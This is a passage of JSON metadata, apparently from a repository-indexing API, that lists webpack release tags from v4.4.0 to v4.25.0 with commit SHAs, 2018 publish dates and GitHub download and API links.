ar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/h